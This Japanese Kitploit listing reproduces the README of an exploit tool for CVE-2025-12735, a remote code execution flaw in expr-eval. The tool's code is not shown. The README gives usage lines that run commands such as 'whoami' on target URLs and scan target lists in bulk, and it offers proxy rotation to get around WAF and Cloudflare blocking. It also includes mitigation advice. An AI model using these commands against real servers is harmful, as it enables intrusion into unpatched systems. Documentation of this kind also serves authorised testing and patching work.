Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-12735-expr-eval-rce — CVE-2025-12735 (expr-eval RCE vulnerability) を検出およびテストするためのセキュリティ調査ツール | Kitploit
ツール/GitHubGitHub/an5i/cve-2025-12735-expr-eval-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHuban5i/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

CVE-2025-12735 (expr-eval RCE vulnerability) を検出およびテストするためのセキュリティ調査ツール

リポジトリを見る
119ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-12735 expr-eval RCE Exploit

expr-eval および expr-eval-fork npm パッケージにおける CVE-2025-12735 脆弱性を検出・テストするためのセキュリティ研究ツール。

⚠️ 免責事項

このツールは 許可されたセキュリティテストおよび教育目的専用 です。コンピュータシステムへの不正アクセスは違法です。このツールは、自分が所有するシステム、またはテストに関する明示的な書面による許可を得たシステムでのみ使用してください。

📋 概要

CVE-2025-12735 は expr-eval および expr-eval-fork npm パッケージにおける重大なリモートコード実行(RCE)脆弱性です。この脆弱性により、攻撃者はパーサーが使用する context オブジェクト内に任意の関数を定義でき、システムレベルのコマンドを実行する悪意のあるコードを注入できます。

CVSS スコア: 9.8 (Critical)
影響を受けるバージョン: expr-eval-fork < 3.0.0
修正バージョン: expr-eval-fork v3.0.0+

🔍 機能

  • 自動検出: JavaScript ファイル内での expr-eval ライブラリの使用をスキャン
  • エンドポイント発見: 評価エンドポイントを自動的に発見
  • 脆弱性テスト: CVE-2025-12735 脆弱性のテスト
  • コマンド実行: RCE の能力を実演(許可されたテスト用)
  • マルチスレッド対応: 複数のターゲットを並列スキャン
  • プロキシ対応: WAF/Cloudflare 制限の回避
  • JSON エクスポート: 詳細な結果を JSON 形式で出力

📦 インストール

前提条件

  • Python 3.6 以上
  • pip (Python パッケージマネージャー)

クイックインストール

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# 依存関係のインストール
pip install -r requirements.txt

# スクリプトを実行可能にする(任意)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

代替方法: 直接ダウンロード

root@kitploit:~
# スクリプトのダウンロード
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# 依存関係のインストール
pip install requests

🚀 使用方法

基本的な使い方

root@kitploit:~
# 単一ターゲット
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# カスタムコマンドの実行
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# ファイルから複数ターゲット
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# スレッドを使用した高速スキャン
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# デバッグ用の詳細出力
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

プロキシの使用

root@kitploit:~
# 単一プロキシ
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# ファイルから複数プロキシ
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

コマンドラインオプション

root@kitploit:~
-u, --url          ターゲットURL
-f, --file         ターゲットURLが記載されたファイル(1行に1URL)
-c, --command      実行するコマンド(デフォルト: id)
-t, --threads      スレッド数(デフォルト: 1)
-o, --output       出力ファイル(デフォルト: uknf_expr_eval_results.json)
-v, --verbose      詳細ログを有効化
--proxy            プロキシURL(例: http://127.0.0.1:8080)
--proxy-list       プロキシURLが記載されたファイル(1行に1URL)

📊 出力

スクリプトは詳細な結果を含む JSON ファイルを生成します:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 動作の仕組み

  1. 検出フェーズ: JavaScript ファイルおよび HTML コンテンツ内の expr-eval 参照をスキャン
  2. エンドポイント発見: expr-eval を使用する可能性のある一般的な API エンドポイントをテスト
  3. 脆弱性テスト: context オブジェクトに任意の関数を注入しようと試みる
  4. 悪用: 脆弱な場合、RCE 能力を実演

🛡️ 緩和策

expr-eval または expr-eval-fork を使用している場合:

  1. 直ちにアップグレード:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. セキュリティパッチを適用:

    • Pull Request #288 を expr-eval に適用
    • または expr-eval-fork v3.0.0+ に切り替え
  3. 入力検証を実装:

    • すべてのユーザー入力をサニタイズ
    • 関数のホワイトリストを使用
    • context オブジェクトを検証

📚 参考文献

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • GitHub Advisory: GHSA-jc85-fpwf-qm7x
  • セキュリティパッチ: PR #288

📖 使用例

例1: 単一ターゲットのスキャン

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

例2: 複数ターゲットと出力

root@kitploit:~
# ターゲットファイルの作成
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# スキャンの実行
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

例3: カスタムコマンドの実行

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

例4: プロキシの使用

root@kitploit:~
# 単一プロキシ
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# ファイルから複数プロキシ
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 貢献

貢献を歓迎します!プルリクエストを遠慮なく送信してください。

  1. リポジトリをフォーク
  2. 機能ブランチを作成 (git checkout -b feature/AmazingFeature)
  3. 変更をコミット (git commit -m 'Add some AmazingFeature')
  4. ブランチにプッシュ (git push origin feature/AmazingFeature)
  5. プルリクエストを開く

🐛 問題

問題が発生した場合や提案がある場合は、GitHub で Issue を開いてください。

📝 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

⭐ スター履歴

このツールが役立つと思われましたら、GitHub でスターを付けていただけると幸いです!

⚖️ 法的情報

このツールは教育目的および許可されたセキュリティテストのために提供されています。作者は、このプログラムの誤用やそれによって生じた損害について一切責任を負いません。ユーザーは、システムをテストする前に適切な許可を得ていることを確認する責任があります。

🙏 謝辞

  • 元の脆弱性報告者: Jangwoo Choe (UKO)
  • 脆弱性開示に関する CERT 調整センター
  • セキュリティ勧告に関する GitHub Security および npm

💰 寄付

このツールが役に立ち、プロジェクトを支援したい場合:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

ご支援ありがとうございます! 🙏

ツールをダウンロード